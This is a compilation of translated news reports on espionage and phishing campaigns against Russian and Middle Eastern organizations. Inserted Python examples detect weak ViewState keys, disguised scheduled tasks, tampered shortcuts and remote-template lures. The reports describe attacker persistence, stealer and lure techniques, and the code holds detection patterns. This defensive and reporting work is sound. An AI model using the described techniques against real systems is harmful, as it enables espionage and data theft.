To penetrate the network, the hackers exploited the vulnerability of deserialization of untrusted data in the ViewState parameter of the ASP.NET environment. Serialization in programming is the process of converting the state of an object to a form suitable for storage or transmission, and deserialization is the inverse process of converting data back into an object. This is necessary to optimize applications (for example, when they interact with each other). However, these processes often contain vulnerabilities that allow attackers to modify data and execute arbitrary code during deserialization.

The vulnerability was partially closed in 2014. At that time Microsoft, the developer of the ASP.NET platform, added to its framework a mechanism for MAC validation of data during deserialization. But it turned out that attackers can bypass this mechanism if they know the ViewState validation keys. To obtain them, an attacker needs either to compromise the IIS server that holds the keys or to reach it by compromising other parts of the organization's network. Perhaps because of the complexity of exploiting the vulnerability, the manufacturer left it in the Won't Fix status (will not be fixed). However, practice has shown that such targeted attacks are quite real: today at least 8 such cases are known in the world.
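A configuration audit that follows from the paragraph above, added here as an example and not taken from Solar or Microsoft: it reads an ASP.NET web.config and reports the settings that decide whether MAC validation still protects ViewState. The sample files, the key value and the finding names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# MAC algorithms treated as legacy in this example (assumption of the example).
WEAK_VALIDATION = {"MD5", "SHA1", "3DES"}

# Constructed sample: static validation key, legacy MAC algorithm, MAC switched off.
WEAK_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF"
                decryptionKey="AutoGenerate,IsolateApps" validation="SHA1" />
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
  </system.web>
</configuration>"""

# Constructed sample: generated per-application keys, HMAC-SHA256, encrypted ViewState.
HARDENED_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps" validation="HMACSHA256" />
    <pages viewStateEncryptionMode="Always" />
  </system.web>
</configuration>"""

# Constructed placeholder for a list of keys known to have leaked
# (for example from backups, repositories or an earlier incident).
EXPOSED_KEYS = ["0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef"]


def audit_viewstate_config(xml_text, exposed_keys=()):
    """Return a sorted list of finding codes for one web.config document."""
    root = ET.fromstring(xml_text)
    exposed = {k.upper() for k in exposed_keys}
    findings = set()

    # <machineKey> may sit under <system.web> or inside a <location> block.
    for mk in root.iter("machineKey"):
        key = mk.get("validationKey", "AutoGenerate")
        if not key.lower().startswith("autogenerate"):
            # A key stored in the file can be reused by anyone who reads the file.
            findings.add("STATIC_VALIDATION_KEY")
            if key.upper() in exposed:
                findings.add("KNOWN_EXPOSED_KEY")
        if mk.get("validation", "HMACSHA256").upper() in WEAK_VALIDATION:
            findings.add("WEAK_VALIDATION_ALG")

    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.add("MAC_DISABLED_IN_CONFIG")
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.add("VIEWSTATE_NOT_ENCRYPTED")

    return sorted(findings)


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_viewstate_config(cfg, EXPOSED_KEYS))
```

STATIC_VALIDATION_KEY is not a defect by itself, since web farms need a shared key; it marks a secret that has to be protected and rotated after any suspected compromise of the server.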

In this investigation, traces of the use of the ViewState deserialization vulnerability were discovered when the attackers began to send serialized instructions to the attacked system to set certain settings (gadgets). In Windows log records, the experts found that these instructions were executed after deserialization. By the logic of ASP.NET, validation keys are required for such gadgets to work successfully. These circumstances indicated a possible attack vector.

In addition, at a certain point, the gadget that allowed the attackers to execute code remotely through deserialization stopped working correctly. Thanks to this event, Solar specialists were able to extract the malicious payload from the serialized data, understand how Obstinate Mogwai executed commands on the customer's server, and finally stop this activity.

This vulnerability has a curious status: on the one hand, it is old and not formally critical, which gives the impression of its relative safety. On the other hand, it gives attackers many opportunities to develop an attack. We did not find comprehensive instructions for detecting and suppressing attacks through ViewState in the public domain, so with the help of our research we want to close this gap, "said Anton Kargin, an expert in the malware analysis group at the Solar Research Center.

Cybercriminals target telecommunications and military-industrial complex in the Middle East

Specialists from the Positive Technologies Security Center (PT Expert Security Center, PT ESC) conducted a comprehensive study of the activities of APT groups targeting organizations in the Middle East. The experts noted that 88% of the groups studied attack Saudi Arabia, and the top 5 attacked industries include government agencies, industry, telecommunications, and the military-industrial and fuel-and-energy complexes. To gain initial access to the infrastructure, attackers mainly send phishing emails and exploit flaws in public-facing applications. Positive Technologies announced this in March 2024.

According to the analysis, the top 7 targets of the attackers included Saudi Arabia (88%), the UAE (75%), Israel (63%), Jordan (56%), Egypt (50%), Kuwait (50%) and Lebanon (44%).

The vast majority of the APT groups considered operating in the Middle East have attacked government agencies (94%) and industry (81%) at least once, and 69% have attacked the fuel and energy complex, said Yana Avezova, senior analyst at Positive Technologies research group. - It is worth noting that government agencies are the most attractive targets for all attackers: they accounted for 22% of the total number of attacks on organizations in the Middle East in 2022-2023.

As noted in the study, the five most attacked industries also included telecommunications companies and the military-industrial complex: every second group attacked them.

According to Positive Technologies experts, the military-industrial complex was in the top of the attacked industries due to the specifics of the region. The Middle East media, compared to other regions, also often become targets of attacks and historically retain a high place in the ranking. Experts attribute the increased interest of cybercriminals in the telecommunications industry to attacks by groups of Chinese origin, since telecommunications has long been one of their main goals.

According to a Positive Technologies analysis, 69% of groups send phishing emails to gain initial access, 31% use flaws in public-facing applications, and 19% place malware on specialized web resources.

"Complex targeted attacks begin with intelligence," said Alexander Badaev, specialist in the information security threat research department of the Positive Technologies Security Center (PT Expert Security Center). - "Attackers can conduct large-scale network scans in search of suitable targets. As a result, attackers have enough information for the initial stage of penetration. Such information includes, for example, the software installed on the target server and its versions that are subject to known vulnerabilities. Reconnaissance is followed by the stage of preparing the tooling for attacks. Attackers can register fake domains and create email accounts or accounts in social networks to conduct targeted phishing."

According to the expert, after gaining initial access, attackers seek to gain a foothold in the infrastructure. 69% of APT groups use Task Scheduler (an operating system component that allows programs or scripts to run when a certain condition is met), as in the campaign against the UAE government, when the OilRig group created a scheduled task named Microsoft Edge Update Service that was triggered every five minutes and launched malware. Most of the attackers (56%) configured the malware to run at startup. A third of APT groups (31%) configured malicious code to be triggered when a certain event occurred, in order to gain persistence on the victim's system.
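A triage check for the scheduled-task persistence described above, added here as an example and not taken from the Positive Technologies study: it parses exported Task Scheduler XML and flags tasks that repeat at short intervals while running a binary outside the usual install directories. The task definitions, the file paths, the name pattern and the 15-minute threshold are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TRUSTED_PREFIXES = (
    "c:\\program files\\",
    "c:\\program files (x86)\\",
    "c:\\windows\\system32\\",
)
VENDOR_WORDS = re.compile(r"update|microsoft|edge|google|chrome", re.I)
DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")

# Constructed task: vendor-like name, five-minute repetition, binary in ProgramData.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft Edge Update Service</URI></RegistrationInfo>
  <Triggers><TimeTrigger>
    <Repetition><Interval>PT5M</Interval></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary>
  </TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\ProgramData\EdgeUpdate\update.exe</Command></Exec></Actions>
</Task>"""

# Constructed task modelled on a genuine updater: hourly, binary under Program Files.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\MicrosoftEdgeUpdateTaskMachineUA</URI></RegistrationInfo>
  <Triggers><CalendarTrigger>
    <Repetition><Interval>PT1H</Interval></Repetition>
    <StartBoundary>2024-01-01T00:00:00</StartBoundary>
  </CalendarTrigger></Triggers>
  <Actions><Exec>
    <Command>"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"</Command>
  </Exec></Actions>
</Task>"""


def duration_minutes(text):
    """Convert an ISO 8601 duration such as PT5M or P1D to minutes, or None."""
    m = DURATION.match(text.strip())
    if not m or not any(m.groups()):
        return None
    days, hours, minutes, seconds = (int(g or 0) for g in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def triage_task(xml_text, max_minutes=15):
    """Return the task name and the reasons it deserves an analyst's attention."""
    root = ET.fromstring(xml_text)
    name = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS).strip("\\")
    intervals = [duration_minutes(e.text or "")
                 for e in root.iterfind(".//t:Repetition/t:Interval", NS)]
    commands = [(e.text or "").strip().strip('"')
                for e in root.iterfind(".//t:Exec/t:Command", NS)]

    reasons = set()
    if any(i is not None and i <= max_minutes for i in intervals):
        reasons.add("SHORT_REPETITION")
    # A trusted directory alone proves nothing (script hosts live in System32),
    # so this is one signal to combine with the others, not a verdict.
    untrusted = [c for c in commands if not c.lower().startswith(TRUSTED_PREFIXES)]
    if untrusted:
        reasons.add("BINARY_OUTSIDE_TRUSTED_DIRS")
        if VENDOR_WORDS.search(name):
            reasons.add("VENDOR_NAME_WITH_UNTRUSTED_BINARY")
    return {"name": name, "reasons": sorted(reasons)}


if __name__ == "__main__":
    for task in (SUSPICIOUS_TASK, BENIGN_TASK):
        print(triage_task(task))
```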

After penetrating the corporate network, attackers study the devices that they managed to access in order to understand how to proceed. As the analysis of Positive Technologies showed, the attackers are primarily interested in data on the operating system and architecture of the compromised node, as well as information on software versions, installed patches and service packs - 94% of groups use this technique. A large number of groups (81%) try to identify users of a compromised node and determine their degree of activity, 63% of attackers study processes running on compromised nodes, 56% analyze files and directories in search of useful information.

As experts from the PT Expert Security Center noted, it is important for APT groups to remain unnoticed in a compromised environment for as long as possible. They resort to various methods of concealing traces of their presence. Typically, attackers pre-test samples of their malware and subsequently modify them to bypass detection by antivirus solutions. A common method is to disguise malware as legitimate files or applications. Most (56%) APT groups remove signs of their activity: they clear event logs and network connection history and change time stamps. These actions subsequently make it much harder for cybersecurity professionals to investigate incidents.

To combat complex targeted attacks and build an effective protection system against them, Positive Technologies experts recommend that organizations pay attention to the basics of effective cybersecurity, which includes:

  • Asset management.
  • Incident monitoring and response.
  • Cybersecurity training.
  • Security assessment.

Foreign hacker group spied on the Russian department

Experts from Solar 4RAYS, the Cyber Threat Research Center of Solar Group, found foreign hackers in the infrastructure of one of the executive authorities. The attackers used complex, disguised, self-written software for espionage, and compromised servers of organizations in different countries for its remote control. Solar reported this on March 6, 2024.

The group has existed for at least three years, but there is not enough data for its exact attribution, so this cluster of activity has been temporarily named NGC2180. By the beginning of March 2024, all detected malware had been neutralized and the affected systems returned to work.

At the end of 2023, Solar 4RAYS specialists conducted a comprehensive analysis of the infrastructure of one of the Russian departments operating with critical data. During the work, signs of hacking were found on one of the computers. A deeper study found in the departmental network several samples of multi-stage malware, which the experts named DFKRAT. At the final stage of the attack, the malware deploys an implant that gives the attacker the ability to manipulate the attacked system (from stealing user data to downloading additional malware).

The discovered version of the malware had not been found anywhere before. But it was possible to find its previous variants in public sources and trace their evolution, starting in 2021. With each new version, the malware became more complex. In particular, in the latest instance the attackers used the DLL side-loading technique (placing malicious code in a folder with a legitimate program) and abandoned the staged transfer of commands from the management server to the target system. Such actions by the malware developers indicate attempts to hide malicious activity from the means of protection on the target host.

One of the samples found from a previous version of the malware was delivered to the victim's computer by a phishing email carrying a loader. In the latest attack, the infection vector remained unknown.

We were able to find and analyze a fragment of the control server code. The file was uploaded to one public service under the name config.jsp from the IP address of Saudi Arabia. Analysis of the network infrastructure showed that it was probably an intermediate victim, whose server was compromised to host the control center (C2) on it. The current version of the implant used a hacked server component of the Institute of Nanoscience and Nanotechnology of the Democritus National Center for Scientific Research in Greece to coordinate its work, "said Alexei Firsh, head of the threat analysis department of the Solar 4RAYS Solar Group of Companies.

The activity of NGC2180 over at least the last three years indicates a highly organized cyber group. The compromise of legitimate servers for the deployment of C2 infrastructure, as well as the focus of NGC2180 on significant government structures, indicates a systematic approach and a possible political motivation of the group.

Based on the analysis of the control server fragment, we believe that in the wild there are even more samples belonging to the described cluster. The malware architecture was qualitatively reworked by hackers from attack to attack: the methods of remote control, delivery and deployment were improved - only the core of the implant itself remained unchanged. All this suggests that behind these attacks is a well-organized group with a large supply of resources, which, as we know from other public studies, are often allocated with the support of the state. In the future, we expect more attacks from NGC2180, so we urge the information security community to use the indicators given in our study to identify traces of the presence of this group, "warned Dmitry Marichev, an expert of the malware analysis group at the Solar 4RAYS Solar Research Center.

Cyber group sends very convincing phishing letters to Russian industrial companies allegedly from government agencies

BI.Zone, a Russian digital risk management company, on January 30, 2024 announced a relatively new cyber campaign aimed at Russian enterprises. The group behind it, Scaly Wolf, is hunting for corporate data. Most of the targets of attacks are industrial and logistics companies from Russia. The last such attack was noted in January 2024.

While attackers use a more or less standard method of initial attack - phishing, there are two circumstances that significantly distinguish the activities of this group from others. Firstly, the letters are disguised as documents of state bodies: requests and requirements of Roskomnadzor, the Investigative Committee of the Russian Federation and the Military Prosecutor's Office of the Russian Federation, as well as court decisions and other orders of regulators.

Secondly, phishing emails are distinguished by a very high level of execution.

"The hallmark of Scaly Wolf is the high level of legal literacy with which letters and forged documents were drawn up. In all cases, the text of the letter looks extremely convincing and inspires trust among users. This encourages the victim to follow the instructions from the letter and open an encrypted archive where the documents are allegedly contained. In fact, there is malware - the White Snake stealer, which allows attackers to access several corporate resources at once, such as e-mail and the CRM system," [3] the BI.Zone publication says.

White Snake is an infostealer, that is, data theft software, popular in the cybercriminal environment.

Characteristically, this malware is distributed under a condition typical of Russian-speaking cybercriminals: it is not to be used against targets in the Russian Federation and CIS countries. To enforce this, a technical measure has been implemented: a function that immediately stops the program if it is launched on a device with an IP address from the "prohibited" regions, as the authors of the publication put it.

However, the Scaly Wolf operators simply disabled this function, leaving everything else in place. In other words, they use the "pirated" version of White Snake and with considerable success.

The fact that the Russian-speaking group attacks targets within the Russian Federation indicates that there are no rules and etiquette for them, "says Alexei Vodyasov, technical director of SEQ. - However, there is nothing new in the fact that some representatives of cyber crime deceive others: it was and will always be because it is primarily crime, and only in the second - "cyber."

BI.Zone believes that Scaly Wolf will continue to carry out attacks on Russian organizations for a long time. The group's methods remain effective, and nothing suggests that this may somehow change.

2023

Hackers attacked a machine-building company with letters on behalf of the Investigative Committee of the Russian Federation

In October 2023, a Russian enterprise in the machine-building sector contacted Doctor Web, suspecting the presence of malware on one of its computers. Experts investigated the incident and found that the affected company had faced a targeted attack. Representatives of Dr.Web reported this to TAdviser on March 11, 2024.

During the attack, the attackers sent phishing emails with attached malware responsible for the initial infection of the system and for installing other malicious tools in it.

As Dr.Web experts found out, the purpose of this attack was to collect sensitive information about employees and to obtain data about the company's infrastructure and its internal network. In addition, data was found to have been uploaded from the infected computer, both as files stored on the computer and as screenshots created while the malware was running.

In early October 2023, the attackers sent several phishing emails to the email address of the affected company on the subject of an "investigation" of certain criminal cases of tax evasion. The letters were sent allegedly on behalf of an investigator of the Investigative Committee of the Russian Federation and contained two attachments. The first was a password-protected zip archive. It contained a malicious program; when it was launched, infection of the system began. The second was a pdf document that was not malicious. It contained phishing text stating that all information about the "criminal case" was in the archive, and prompted the recipient to open the malware in it.

The very first phishing email contained the archive "Requirement 19098 Trace to the Russian Federation from the 02.10.23 PASSWORD - 123123123.zip." In turn, the Trojan program located in it was hidden in the file "List of legal entities and enterprises, tax evasion, claims and additional.exe."

One of the last messages sent was the following:

Attached to it was a phishing pdf-document "Investigator's requirement, tax evasion (request within the framework of the DD).pdf" and a zip archive "Requirement 19221 of the RF IC from the PASSWORD 11.10.2023 - 123123123.zip" with the following content:

As in earlier messages, the attackers specified the password for extracting files from the archive in both its name and in the name of the document "Password for opening.odt 123123123." This document itself, as well as the files "Rights and Obligations and Procedure of Art. 164, 170, 183 Code of Criminal Procedure RF.pdf" and "SC RF.PNG," were not malicious. This archive contained two copies of the malicious program: "List of enterprises, tax evasion, as well as additional materials.exe" and "Additional materials, list of questions, invoices and primary documents.exe."

According to Dr.Web, in all cases, a malicious application spread by cybercriminals was Trojan.Siggen21.39882. This malware, known as WhiteSnake Stealer, is sold in the shadow segment Internet () Darknet and is used to steal accounts from various software, as well as other data. In addition, it can download and install other malicious applications on attacked computers. In the target attack under consideration, she was assigned the role of the first stage of infection. Having received the appropriate commands, the malware collected and transmitted to the attackers information about the configuration of the profiles - Wi-Fi networks of the infected system, as well as passwords for access to them. Then she launched - SSH proxy server and installed the second stage in the system.

The second stage and at the same time the main tool of attackers, as Dr.Web experts found out JS.BackDoor.60 was the backdoor malware ― through which the main interaction between attackers and an infected computer passed. One of the features of the backdoor is that it uses its own framework in JavaScript. The Trojan consists of the main obfuscated body, as well as auxiliary modules, which, thanks to the specifics of the malware architecture, are both part of it and the tasks that it performs through JavaScript functions common to them. New tasks arrive at the Trojan from the control server and actually turn it into a multi-component threat with expandable functionality, which allows it to be used as a powerful cyber espionage tool.

The mechanism by which JS.BackDoor.60 ensured its autorun is also interesting. Along with one of the traditional ways, making the necessary changes to the Windows registry, the Trojan modified shortcut files (.lnk) in a specific way. To do this, it checked the contents of a number of system directories, including the desktop and taskbar directories, and assigned wscript.exe as the target application for all shortcuts found in them, except Explorer.lnk or Explorer. Special arguments were specified for running it, one of which was an alternate data stream (ADS) into which the backdoor body was written. As a result of the changes, the modified shortcuts first launched JS.BackDoor.60 and then the original programs.
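The shortcut tampering described above can be checked for offline during triage. The following is an added example, not Dr.Web's code or part of the original report: a minimal Shell Link (.lnk) parser that flags shortcuts whose target is a Windows script host and whose arguments reference an alternate data stream. The sample shortcuts, their paths and arguments, and all function names are constructed for the demonstration.

```python
import re
import struct

# LinkFlags bits of the Shell Link header (MS-SHLLINK, ShellLinkHeader)
HAS_ID_LIST, HAS_LINK_INFO, HAS_ARGS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
# StringData fields appear in this fixed order when their flag bit is set
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon"))
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def parse_lnk(data: bytes) -> dict:
    """Extract the target path and command-line arguments from .lnk bytes."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_ID_LIST:  # skip IDListSize and the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    target = ""
    if flags & HAS_LINK_INFO:
        size, _hdr, info_flags, _vol, base_off = struct.unpack_from("<5I", data, pos)
        if info_flags & 0x01:  # VolumeIDAndLocalBasePath: ANSI, NUL-terminated
            start = pos + base_off
            target = data[start:data.index(b"\x00", start)].decode("cp1252", "replace")
        pos += size
    fields = {}
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit, key in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]  # characters, not bytes
            pos += 2
            fields[key] = data[pos:pos + count * width].decode(codec, "replace")
            pos += count * width
    return {"target": target or fields.get("relative_path", ""),
            "arguments": fields.get("arguments", "")}


def ads_arguments(arguments: str) -> list:
    """Return the arguments that look like file:stream references."""
    hits = []
    for token in re.findall(r'"[^"]*"|\S+', arguments):
        token = token.strip('"')
        if token.startswith("/"):  # host option such as //E:jscript, not a path
            continue
        rest = re.sub(r"^[A-Za-z]:", "", token)  # the drive-letter colon is not a stream
        if ":" in re.split(r"[\\/]", rest)[-1]:
            hits.append(token)
    return hits


def assess_shortcut(data: bytes) -> dict:
    """Flag a shortcut that runs a script host with an ADS argument."""
    info = parse_lnk(data)
    host = re.split(r"[\\/]", info["target"])[-1].lower()
    info["script_host"] = host in SCRIPT_HOSTS
    info["ads_arguments"] = ads_arguments(info["arguments"])
    info["suspicious"] = info["script_host"] and bool(info["ads_arguments"])
    return info


def build_sample(target: str, arguments: str) -> bytes:
    """Build a minimal constructed .lnk: header, LinkInfo with a local path, arguments."""
    header = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")
    header += struct.pack("<I", HAS_LINK_INFO | HAS_ARGS | IS_UNICODE) + bytes(52)
    path = target.encode("cp1252") + b"\x00"
    link_info = struct.pack("<7I", 28 + len(path) + 1, 28, 1, 0, 28, 0,
                            28 + len(path)) + path + b"\x00"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return header + link_info + args


# Constructed samples: a tampered shortcut and an untouched one
MODIFIED_LNK = build_sample(
    r"C:\Windows\System32\wscript.exe",
    r'//E:jscript //B "C:\Users\Public\Documents\report.dat:body" '
    r'"C:\Program Files\App\app.exe"')
ORIGINAL_LNK = build_sample(r"C:\Program Files\App\app.exe", "--profile default")

if __name__ == "__main__":
    for label, blob in (("modified", MODIFIED_LNK), ("original", ORIGINAL_LNK)):
        result = assess_shortcut(blob)
        print(label, result["target"], result["ads_arguments"], result["suspicious"])
```

On a live system the same check would be run over the .lnk files in the desktop and taskbar directories the report mentions, reading each file's bytes into assess_shortcut.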

Throughout the attack, the attackers actively sent various commands to the backdoor and with its help stole the contents of dozens of directories from the infected computer, which contained both personal and corporate data. In addition, Dr.Web recorded that the Trojan took screenshots.

An additional surveillance tool in the attack in question was the BackDoor.SpyBotNET.79 malware, which was used to eavesdrop on and record conversations through a microphone connected to the infected computer. This Trojan recorded audio only when it detected sound of a certain intensity, in particular that characteristic of a voice.

At the same time, the attackers also tried to infect the system with the Trojan.DownLoader46.24755 downloader Trojan, but due to an error they were unable to do this.

The chronology of the attack is presented in the following diagram:

The chronology of receiving tasks by the JS.BackDoor.60 Trojan:

In general, the analysis did not unambiguously link this attack to any of the previously known APT groups, the Dr.Web experts concluded.

According to them, the use of malicious tools that are available as a commercial service (MaaS, Malware as a Service), such as Trojan.Siggen21.39882, allows even relatively inexperienced attackers to carry out quite painful attacks on both businesses and government agencies. In turn, social engineering still poses a serious threat.

"This is a relatively simple but effective way to bypass the built protection that both experienced and novice cybercriminals can use. In this regard, it is especially important to protect the entire infrastructure of enterprises, including workstations and email gateways. In addition, it is recommended to periodically instruct employees on the topic of information security and acquaint them with current digital threats. All these measures will help reduce the likelihood of cyber incidents, as well as minimize damage from attacks," Dr.Web added.

Cyber espionage group attacks Russian companies, hiding behind the topic of support for participants in the SVO

F.A.C.C.T. recorded attacks by the Cloud Atlas spy group on a Russian agro-industrial enterprise and a state-owned research company. Both mailings were intercepted by F.A.C.C.T. Managed XDR, a system for protection against complex and unknown cyber threats. The company announced this on December 19, 2023.

According to F.A.C.C.T., Cloud Atlas is a pro-state APT group specializing in cyber espionage and theft of confidential information. According to researchers, it has been active since at least 2014. More often than others, the targets of Cloud Atlas were industrial enterprises and state-owned companies in Russia, Belarus, Azerbaijan, Turkey and Slovenia[4].

Cloud Atlas prefers targeted mailings with a malicious attachment as its main attack vector. As part of the campaign, the attackers used the addresses antonowadebora@yandex.ru and mil.dip@mail.ru, registered through public mail services, and two topical subjects: support for participants in the SVO and military registration.

Screenshot of a letter with an attachment for union leaders asking them to support the participants of the SVO and their families

In the first letter, the attackers, on behalf of representatives of the Moscow City Organization of the All-Russian Professional Union of Employees of State Institutions, propose to organize the collection of postcards and congratulations to the participants of the SVO and their families. The contacts indicated in the letter are real - they can be found in the public domain.

Screenshot of a letter about changes in legislation on the introduction of military registration and reservation of citizens in the reserve

In another mailing, the attackers pose as the "Association of Training Centers" and use the topical subject of changes in the legislation on the introduction of military registration and reservation of citizens in the reserve.

When the user opens the document dated 20.11.2023 from the email attachment, the remote template it links to is downloaded. The referenced template is an RTF file containing an exploit for the CVE-2017-11882 vulnerability.
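One way to triage an attachment for the remote-template technique described above, shown as an added example that is not F.A.C.C.T.'s code or part of the original report: it lists the external relationships inside a .docx package and reports attachedTemplate targets that point to a remote host. The sample packages, host names and function names are constructed for the demonstration.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL_TAG = "{%s}Relationship" % PKG_NS
MAX_PART_SIZE = 1_000_000  # refuse to inflate oversized .rels parts


def external_relationships(docx_bytes: bytes) -> list:
    """List every relationship in the package that points outside the file."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels") or zf.getinfo(part).file_size > MAX_PART_SIZE:
                continue
            xml = zf.read(part)
            if b"<!DOCTYPE" in xml:  # package parts carry no DTD; report, do not parse
                found.append({"part": part, "type": "unexpected-dtd", "target": ""})
                continue
            for rel in ET.fromstring(xml).iter(REL_TAG):
                if rel.get("TargetMode", "").lower() == "external":
                    found.append({"part": part,
                                  "type": rel.get("Type", "").rsplit("/", 1)[-1],
                                  "target": rel.get("Target", "")})
    return found


def is_remote(target: str) -> bool:
    """True for web URLs and for UNC or file:// targets that name a host."""
    if target.startswith("\\\\"):
        return True
    parts = urlsplit(target)
    return parts.scheme in {"http", "https", "ftp"} or (
        parts.scheme == "file" and bool(parts.netloc))


def remote_templates(docx_bytes: bytes) -> list:
    """Targets of attachedTemplate relationships that are fetched from another host."""
    return [r["target"] for r in external_relationships(docx_bytes)
            if r["type"] == "attachedTemplate" and is_remote(r["target"])]


def build_docx(rels: dict) -> bytes:
    """Build a constructed, minimal package containing only the given .rels parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        for part, entries in rels.items():
            body = "".join(
                '<Relationship Id="rId%d" Type="%s/%s" Target="%s"%s/>' % (
                    i, OFFICE_REL, kind, target,
                    ' TargetMode="External"' if external else "")
                for i, (kind, target, external) in enumerate(entries, 1))
            zf.writestr(part, '<?xml version="1.0"?><Relationships xmlns="%s">%s'
                              '</Relationships>' % (PKG_NS, body))
    return buf.getvalue()


# Constructed samples: a lure with a remote template, and a document that
# merely references a template on the local disk
LURE_DOCX = build_docx({
    "word/_rels/settings.xml.rels": [
        ("attachedTemplate", "https://templates.example.invalid/form.dotm", True)],
    "word/_rels/document.xml.rels": [
        ("hyperlink", "https://www.example.org/", True),
        ("styles", "styles.xml", False)],
})
LOCAL_TEMPLATE_DOCX = build_docx({
    "word/_rels/settings.xml.rels": [
        ("attachedTemplate", "file:///C:/Templates/Normal.dotm", True)],
})

if __name__ == "__main__":
    for label, blob in (("lure", LURE_DOCX), ("local", LOCAL_TEMPLATE_DOCX)):
        print(label, remote_templates(blob), external_relationships(blob))
```

A hyperlink is also an external relationship but is only followed on a click, which is why the check keys on the attachedTemplate type and on whether the target names another host.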

Cyber threat trends presented

On November 14, 2023, the Solar Group of Companies presented the top 10 most attacked industries in 2023, a surge in cyber attacks by Asian hackers and an increase in the number of incidents with devastating consequences for organizations in the Russian Federation, and shared its forecasts for 2024.

The most serious cyber threat for Russian organizations is posed by professional APT groups (advanced persistent threat, a constant threat of increased complexity). According to an analyst at the Solar 4RAYS Cyber Threat Research Center, in 2022-2023 the share of APT attacks amounted to 20% of all incidents under investigation. Their danger is that it is almost impossible to determine the points at which the hackers penetrated the company's infrastructure without specialized expertise: attackers either cover their tracks too well or have been in the infrastructure for so long that it is not possible to find them. The main goal of groups of this type is cyber espionage and data theft, and their main victims are the telecom industry and the public sector.

According to Rostelecom telemetry, among the advanced groups the most active in the Russian Federation were hackers from the Asian region, first of all Chinese groups. In September 2023 they launched another cyber espionage campaign: 20 to 40 systems of Russian organizations were infected with malware every day, and only a month later were the attackers noticed by vendors of security products, after which their activity declined.


The North Korean group Lazarus is also very active on the territory of the Russian Federation. Over the past 2 years, Solar 4RAYS experts have investigated several related incidents. Among the victims were, in particular, state authorities. At the same time, an analysis of sensor data showed that at the beginning of November Lazarus hackers still had access to a number of Russian systems.


Identifying the Ukrainian groups directly behind the flurry of attacks is quite difficult, since a huge number of politically motivated attackers from different regions act in their interests, experts say. Nevertheless, in some cases it was possible to identify Ukrainian hackers on indirect grounds. For example, they conducted malicious mailings using the open framework Pupy RAT, the experts added, and recently they managed to attack one of the telecom operators, which led to the destruction of part of its infrastructure.

"Thanks to telemetry from the Rostelecom network, as well as from the services of the Solar JSOC Cyber Attack Countermeasures Center and the Solar MSS platform, we not only detect existing hacks in a timely manner, but also receive information about upcoming incidents and investigate the activities of hackers of various levels, including APT groups, on a country-wide scale. We predict that in 2024 advanced groups will maintain the volume of their campaigns, and the trend towards hacking contractors will take a leading place," said Igor Zalevsky, head of the Solar 4RAYS Cyber Threat Research Center, Solar Group of Companies.

During SOC-Forum 2023, experts from the Solar Group named the top 10 industries most affected by hackers in 2022-2023. Most of the cyber attacks targeted state organizations (44%) and telecom (14%), as well as agriculture (9%); the latter can be explained by the proximity of the industry to the state. The rating also includes industry (7%), the financial sector (7%), and, with equal shares of 4%, retail, services, education, NGOs and the power sector.


Most of the incidents under investigation involve cyber fraudsters (42.5%), who usually make money from hacks by encrypting, stealing and reselling data. Second place is taken by cyber hooligans (30%), who try to attract attention through a minimal impact on the IT infrastructure, for example DDoS attacks and website defacement. In third place are professional APT groups (20%).


In 2022, due to the political situation, cyber hooligans became more active, but in 2023 the number of incidents that required the involvement of investigation experts decreased threefold. The fact is that numerous mass attacks taught companies and the information security industry to respond to them better, and the attackers themselves switched to more serious goals.

At the same time, the number of attacks organized by cyber fraudsters continues to grow and in 2023 increased by 30% compared to 2022. With the onset of 2023, hackers of this type almost ceased to be interested in monetization, and instead of selling data on the dark web, they began to publish it for free or irrevocably encrypt it in order to cause more damage to the affected party.

